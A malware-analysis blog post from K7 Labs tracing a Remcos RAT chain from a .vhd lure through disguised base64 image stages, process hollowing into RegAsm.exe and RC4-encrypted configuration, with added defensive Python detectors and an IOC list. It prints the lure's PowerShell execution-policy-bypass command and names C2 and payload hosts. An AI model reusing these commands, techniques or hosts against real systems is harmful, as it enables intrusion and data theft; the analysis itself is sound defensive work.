Unknown TTPs of Remcos RAT

labs.k7computing.com · Vigneshwaran P · 2 years ago · threat-intel
Posted by K7 Labs · March 26, 2024 (updated July 1, 2024) · Remote Access Trojan

Typically spread through malicious attachments, drive-by downloads or social engineering, Remcos RAT has been active since 2016. Initially presented by BreakingSecurity, a European company, as a legitimate remote control tool, it has since been abused by threat actors for malicious purposes, despite the vendor's claims that access is restricted to lawful use.

While analysing a few samples from VirusTotal, we came across an interesting one: a .vhd (Virtual Hard Disk) file. Let's look at how the threat actors crafted it.

Extracting the .vhd file yields the bundle of files shown in Figure 1.

Figure 1: Extracted VHD file

The shortcut file's target holds the following command line, which runs the MacOSX.ps1 script via cmd.exe and powershell.exe. Its deconstructed components are depicted in Figure 1:

\\localhost\C$\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File ".MacOSX/MacOSX.ps1"

Two details of this target are worth noting: the local cmd.exe is reached through the loopback admin share (\\localhost\C$) rather than a drive letter, and the script path is relative, so it resolves against the mounted disk the shortcut is launched from.

Analysing the script shows several operations, some of which appear to be remnants of an older TTP:

- Download a PDF file disguised as a PNG (Figure 2)
- Create a scheduled task that downloads and executes a PowerShell script (Figure 3)

The key functionalities of the script are:

- AMSI bypass (Figure 4)
- Download a PNG file which is in fact a base64-encoded VB script (Figure 5)

Figure 2: Downloading PDF

Figure 3: Scheduled task

Figure 4: AMSI Reaper

The AMSI bypass is AMSIReaper, an open-source tool available on GitHub.

Figure 5: Downloading PNG file (elana.png)

The command stored in $binaryData (Figure 6) downloads a file, elana.png, from hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/elana.png. Despite the extension, the file is a base64-encoded VB script; the PowerShell script decodes it and saves it under %ProgramData% as second.ps1.
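A small triage helper for shortcut targets like the one quoted above, added here as an example and not part of K7's analysis or the campaign's code. It scores an LNK target or command line on the traits this lure combines: a loopback admin-share path to a local binary, -ExecutionPolicy Bypass (including the abbreviated switch spellings powershell.exe accepts), a relative script path in a dot-prefixed folder, and cmd.exe /c used only as a trampoline into PowerShell. Only the first sample string is from the post; the other two command lines are constructed benign controls, and extracting the target string from the .lnk itself (with any LNK parser) is assumed to have happened beforehand.

```python
import re

# Constructed inputs. "vhd_lnk" is the LNK target quoted in the post; the
# other two are benign command lines made up for contrast.
SAMPLES = {
    "vhd_lnk": r'\\localhost\C$\Windows\System32\cmd.exe /c powershell.exe '
               r'-ExecutionPolicy Bypass -File ".MacOSX/MacOSX.ps1"',
    "admin_script": r'C:\Windows\System32\cmd.exe /c powershell.exe -NoProfile '
                    r'-File "C:\Scripts\backup.ps1"',
    "plain_app": r'"C:\Program Files\Git\git-bash.exe"',
}

# (rule name, regex). Case-insensitive: Windows paths and PowerShell switches are.
RULES = [
    # Local binary reached through the loopback admin share (\\localhost\C$\...)
    # instead of a drive letter.
    ("loopback-admin-share",
     re.compile(r"\\\\(?:localhost|127\.0\.0\.1)\\[a-z]\$\\", re.I)),
    # -ExecutionPolicy Bypass, including the abbreviated switches powershell.exe
    # accepts (-ep, -ex, -exec, ...).
    ("execpolicy-bypass",
     re.compile(r"-(?:ep|ex[a-z]*)\s+bypass\b", re.I)),
    # -File pointing at a relative path whose first component is a dot-prefixed
    # folder (".MacOSX" here), so the script resolves relative to wherever the
    # shortcut is launched from.
    ("relative-dot-folder-script",
     re.compile(r'-f(?:ile)?\s+"?\.[^\s"\\/]+[\\/][^\s"]+\.ps1', re.I)),
    # cmd.exe /c used purely as a trampoline into powershell.exe.
    ("cmd-to-powershell-trampoline",
     re.compile(r"cmd\.exe\s+/c\s+powershell(?:\.exe)?\b", re.I)),
]


def triage_target(cmdline: str) -> list:
    """Names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def score(cmdline: str) -> int:
    """Number of matched rules; three or more is a strong lure signal."""
    return len(triage_target(cmdline))


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:13s} score={score(cmd)} hits={triage_target(cmd)}")
```

The rules are deliberately narrow: a legitimate admin script launched through cmd.exe trips only the trampoline rule, while the VHD lure matches all four.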
On further analysis, the PNG file turned out to be a VB script.

Figure 6: VB script in elana.png

The script defines a function, peopaias, which creates an Internet Explorer instance (apegadas), navigates to a blank page and waits until the page has fully loaded. It then sets the browser window's properties, including position and size, waits until a user-input element is available on the page, reads that input's value and quits the browser. It also defines a function, convertibilidade, which takes a string parameter cytiso containing script code and runs it with ExecuteGlobal.

From the URL hxxp://paste.ee/d/azfhe we obtained a base64-encoded VB script.

Figure 7: Encoded VB script

Decoding that VB script gave a PowerShell script which was itself base64-encoded.

Figure 8: Encoded PowerShell script in decoded VB script

Executing the PowerShell script and capturing its output revealed yet another VB script.

Figure 9: VB script in decoded PowerShell script

This VB script downloads an image file from hxxps://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673.

Figure 10: Downloading PNG

The image carries a base64-encoded value in its overlay, i.e. data appended after the image itself.

Figure 11: Base64 value in PNG overlay

Decoding it yields a PE file, a .NET DLL.

Figure 12: .NET binary

Analysing the .NET DLL in dnSpy shows how and where the attackers use the main payload. The DLL performs process hollowing: it injects the Remcos payload into a newly created RegAsm.exe process. When the function is invoked, it looks for RegAsm.exe at the following location on the victim's device: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.
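Both "image" downloads in this chain hide data in one of two ways: elana.png is a base64 blob with no image in it at all, and new_image.jpg is a real image with a base64 value appended after the image data. The following Python, an added example and not the post's or the attackers' code, carves both forms: it walks PNG chunks to find the bytes after IEND (and, more naively, takes whatever follows the last JPEG EOI marker), base64-decodes the candidate strictly, labels the result as a PE, VBScript or PowerShell text, and recovers URLs that are stored reversed in script text. All inputs are constructed in build_samples() (a synthetic 1x1 PNG and a bare-bones JPEG with a fake MZ header appended, and a made-up VBScript using the reserved example.com domain); the script keyword lists are assumptions for rough labelling, not Remcos-specific signatures.

```python
from __future__ import annotations

import base64
import binascii
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_overlay(data: bytes):
    """Walk PNG chunks; return the bytes after IEND (b'' if none), or None if not a PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + data + CRC
        if ctype == b"IEND":
            return data[pos:]
    return b""                         # truncated image, nothing after IEND


def jpeg_overlay(data: bytes):
    """Naive JPEG variant: whatever follows the last EOI marker (FF D9)."""
    if not data.startswith(b"\xff\xd8"):
        return None
    eoi = data.rfind(b"\xff\xd9")
    return data[eoi + 2:] if eoi != -1 else b""


def try_b64(blob: bytes):
    """Strict base64 decode after dropping whitespace; None if it is not base64."""
    compact = re.sub(rb"\s+", b"", blob)
    if len(compact) < 8:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


# Assumed keyword lists for a rough label; they are not Remcos-specific signatures.
SCRIPT_MARKERS = {
    "vbscript": (b"executeglobal", b"createobject", b"wscript"),
    "powershell": (b"frombase64string", b"invoke-expression", b"powershell"),
}


def classify(payload: bytes) -> str:
    if payload.startswith(b"MZ"):
        return "pe"
    low = payload.lower()
    for kind, markers in SCRIPT_MARKERS.items():
        if any(m in low for m in markers):
            return kind
    return "unknown"


URL_RX = re.compile(rb"https?://[\w.\-/%?=&:]+")


def reversed_urls(text: bytes) -> list:
    """URLs that only read forwards once the text is reversed (stored like 'moc.elpmaxe//:sptth')."""
    return URL_RX.findall(text[::-1])


def carve(data: bytes) -> dict:
    """Locate the hidden payload in an 'image' file and describe it."""
    for container, fn in (("png", png_overlay), ("jpeg", jpeg_overlay)):
        overlay = fn(data)
        if overlay is not None:
            break
    else:
        container, overlay = "none", data   # no image at all: the whole file is the candidate
    decoded = try_b64(overlay)
    payload = decoded if decoded is not None else overlay
    kind = classify(payload)
    return {
        "container": container,
        "base64": decoded is not None,
        "kind": kind,
        "payload": payload,
        "urls": reversed_urls(payload) if kind != "pe" else [],
    }


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_samples() -> dict:
    """Constructed inputs: a 1x1 PNG and a minimal SOI..EOI JPEG skeleton, each with a
    fake PE appended as base64, the clean PNG, and a bare base64 file holding a
    VBScript whose URL is stored reversed (reserved example.com domain)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    png = PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IEND", b"")
    jpg = b"\xff\xd8\xff\xe0" + b"\x00" * 4 + b"\xff\xd9"
    fake_pe = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x90" * 32
    rev_url = b"https://cdn.example.com/stage.xml"[::-1]
    vbs = (b'u = "' + rev_url + b'"\n'
           b'Set o = CreateObject("MSXML2.XMLHTTP")\n'
           b'o.Open "GET", StrReverse(u), False\no.Send\n'
           b'ExecuteGlobal o.responseText\n')
    return {
        "png-with-overlay": png + base64.b64encode(fake_pe),
        "jpeg-with-overlay": jpg + base64.b64encode(fake_pe),
        "clean-png": png,
        "bare-base64-script": base64.b64encode(vbs),
    }


if __name__ == "__main__":
    for name, blob in build_samples().items():
        r = carve(blob)
        print(f"{name:20s} container={r['container']} base64={r['base64']} "
              f"kind={r['kind']} urls={r['urls']} head={r['payload'][:8]!r}")
```

The PNG walk is exact because the chunk lengths are in the header; the JPEG path only looks for the last EOI marker and will be fooled by an overlay that itself contains FF D9, which base64 text cannot.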
The following APIs are used for the process hollowing: CreateProcess() with the CREATE_SUSPENDED flag (0x4), GetThreadContext(), ZwUnmapViewOfSection(), VirtualAllocEx(), WriteProcessMemory(), SetThreadContext() and ResumeThread().

The URL hosting the final payload is stored as a reversed string in the VB script, as shown in Figure 13.

Figure 13: Reversed URL string

The main payload, Remcos, is a VC8-compiled (Visual C++ 2008) binary.

Figure 14: C++ binary payload

It first decrypts an RC4-encrypted blob stored in the resource section under the name "SETTINGS".

Figure 15: Getting resource

Figure 16: Manipulating resource

In the blob, the first byte (0x3E) is the size of the RC4 key; the key itself follows, and the rest is the encrypted Remcos configuration block.

Figure 17: Decoded RC4 in SETTINGS

From this configuration block we can recover the C2 addresses, the malware's enabled activities and more.

It sets a "Run" registry entry for persistence.

Figure 18: Persistence

Among the important fields in the configuration are the filename used for logging the victim's keystrokes and clipboard data, the settings that tell Remcos how to initiate its functionalities on the victim's device, and the authentication details used to establish the connection to the C2 server.

Figure 19: Keylogging

It also creates a mutex to avoid running more than one instance of the binary. Remcos records audio from the victim's microphone as well.

Figure 20: Stealing audio

Remcos RAT connects to a URL to collect geolocation information.

Figure 21: Geolocation

Other capabilities of Remcos RAT include:

- Capturing screenshots of the victim's screen upon startup.
- Disabling User Account Control (UAC) on the victim's device.
- Sending the collected data to the C2.

Attackers keep finding fresh strategies to evade antivirus (AV) and Endpoint Detection and Response (EDR) systems in order to sustain their attacks. We at K7 Labs provide detection for Remcos and all the latest threats. Users are advised to use a reliable security product such as "K7 Total Security" and keep it up to date to safeguard their devices.
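Two helpers for the final stage described above, added as an example and not K7's or Remcos's code. detect_hollowing() walks a constructed API-call trace and flags a source process that completes, in order, the API sequence listed above against a process it created with CREATE_SUSPENDED; a suspended start that is merely resumed does not trigger it. decrypt_settings() parses the SETTINGS layout described above (key-length byte, key, RC4 ciphertext) with a from-scratch RC4, and build_settings() is its inverse, used only to construct the sample blob. The trace events, the 0x3E-byte key and the configuration text are all constructed; the '|' separator in the sample configuration is illustrative and not a claim about the real field layout.

```python
from __future__ import annotations

CREATE_SUSPENDED = 0x4
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Steps that must follow a CREATE_SUSPENDED CreateProcess, in this order (the
# API list given in the post). Either Zw/Nt spelling of UnmapViewOfSection is
# accepted.
HOLLOW_STEPS = (
    ("GetThreadContext",),
    ("ZwUnmapViewOfSection", "NtUnmapViewOfSection"),
    ("VirtualAllocEx",),
    ("WriteProcessMemory",),
    ("SetThreadContext",),
    ("ResumeThread",),
)


def detect_hollowing(events: list) -> list:
    """Flag each (source pid, target pid) pair that completes HOLLOW_STEPS in order
    against a process the source created suspended. Events are dicts with keys
    pid, api, target and, for CreateProcess, image and flags."""
    pending: dict = {}      # (pid, target) -> {"step": int, "image": str}
    findings = []
    for ev in events:
        key = (ev["pid"], ev["target"])
        if ev["api"] == "CreateProcess":
            if ev.get("flags", 0) & CREATE_SUSPENDED:
                pending[key] = {"step": 0, "image": ev.get("image")}
            else:
                pending.pop(key, None)
            continue
        st = pending.get(key)
        if st is None or ev["api"] not in HOLLOW_STEPS[st["step"]]:
            continue            # out-of-order or unrelated call: ignore
        st["step"] += 1
        if st["step"] == len(HOLLOW_STEPS):
            findings.append({"pid": ev["pid"], "target": ev["target"], "image": st["image"]})
            del pending[key]
    return findings


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """SETTINGS layout as described in the post: byte 0 is the key length (0x3E in
    the analysed sample), the key follows, and the rest is the RC4 ciphertext.
    In practice the blob comes from the RCDATA resource named SETTINGS."""
    key_len = blob[0]
    key = blob[1:1 + key_len]
    if key_len == 0 or len(key) != key_len:
        raise ValueError("empty or truncated key in SETTINGS blob")
    return rc4(key, blob[1 + key_len:])


def build_settings(key: bytes, config: bytes) -> bytes:
    """Inverse of decrypt_settings; only used here to construct the sample blob."""
    return bytes([len(key)]) + key + rc4(key, config)


# Constructed sample data.
TRACE = [
    {"pid": 4120, "api": "CreateProcess", "target": 5208, "image": REGASM, "flags": CREATE_SUSPENDED},
    {"pid": 4120, "api": "GetThreadContext", "target": 5208},
    {"pid": 4120, "api": "ZwUnmapViewOfSection", "target": 5208},
    {"pid": 4120, "api": "VirtualAllocEx", "target": 5208},
    {"pid": 4120, "api": "WriteProcessMemory", "target": 5208},
    {"pid": 4120, "api": "SetThreadContext", "target": 5208},
    {"pid": 4120, "api": "ResumeThread", "target": 5208},
    # Benign control: a debugger-style suspended start that is simply resumed.
    {"pid": 900, "api": "CreateProcess", "target": 901, "image": r"C:\tools\app.exe", "flags": CREATE_SUSPENDED},
    {"pid": 900, "api": "ResumeThread", "target": 901},
]
SAMPLE_KEY = bytes(range(0x41, 0x41 + 0x3E))      # 62-byte key, matching the 0x3E length byte
SAMPLE_CONFIG = b"c2.example.invalid:2404|botnet-constructed|1|logs.dat"   # '|' layout is illustrative

if __name__ == "__main__":
    print("hollowing:", detect_hollowing(TRACE))
    blob = build_settings(SAMPLE_KEY, SAMPLE_CONFIG)
    print("blob[0] = 0x%02x, config = %r" % (blob[0], decrypt_settings(blob)))
```

The detector is strict about order on purpose: a real EDR rule would tolerate interleaved calls and missing GetThreadContext, but the ordered sequence keyed on the suspended-created target is what separates hollowing from an ordinary suspended start.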
IOCs

MD5                                Detection Name
8E125841810C306790958A95D6DBEB5    Riskware (00584baa1)
C50DC32F0CABCF7D7B44031031026078   Trojan (0057ef441)
AA387BA65FF8C796CBE90FEEC010C008   Trojan (0001140e1)

URLs
hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/S-Corp_AUELLC1.png
hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/elana.png
hxxps://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
hxxps://bitbucket.org/!api/2.0/snippets/openheartplayercertlover/jqEMdz/87de249e540d810ba6df8cabeca4b0d89589a73b/files/elanaworkrem
hxxp://paste.ee/d/azfhe

C2
lora1.safesopkoco.com:2404
lora2.safesopkoco.com:2404
safesopkoco.com:2404
masterbotsbrothers.xyz:2404
mota1.masterbotsbrothers.xyz:2404
mota2.masterbotsbrothers.xyz:2404
lora1.safesopkoco.co:2404
lora2.safesopkoco.co:2404
lora2.safesopko.net:2404
lora1.safesopko.net:2404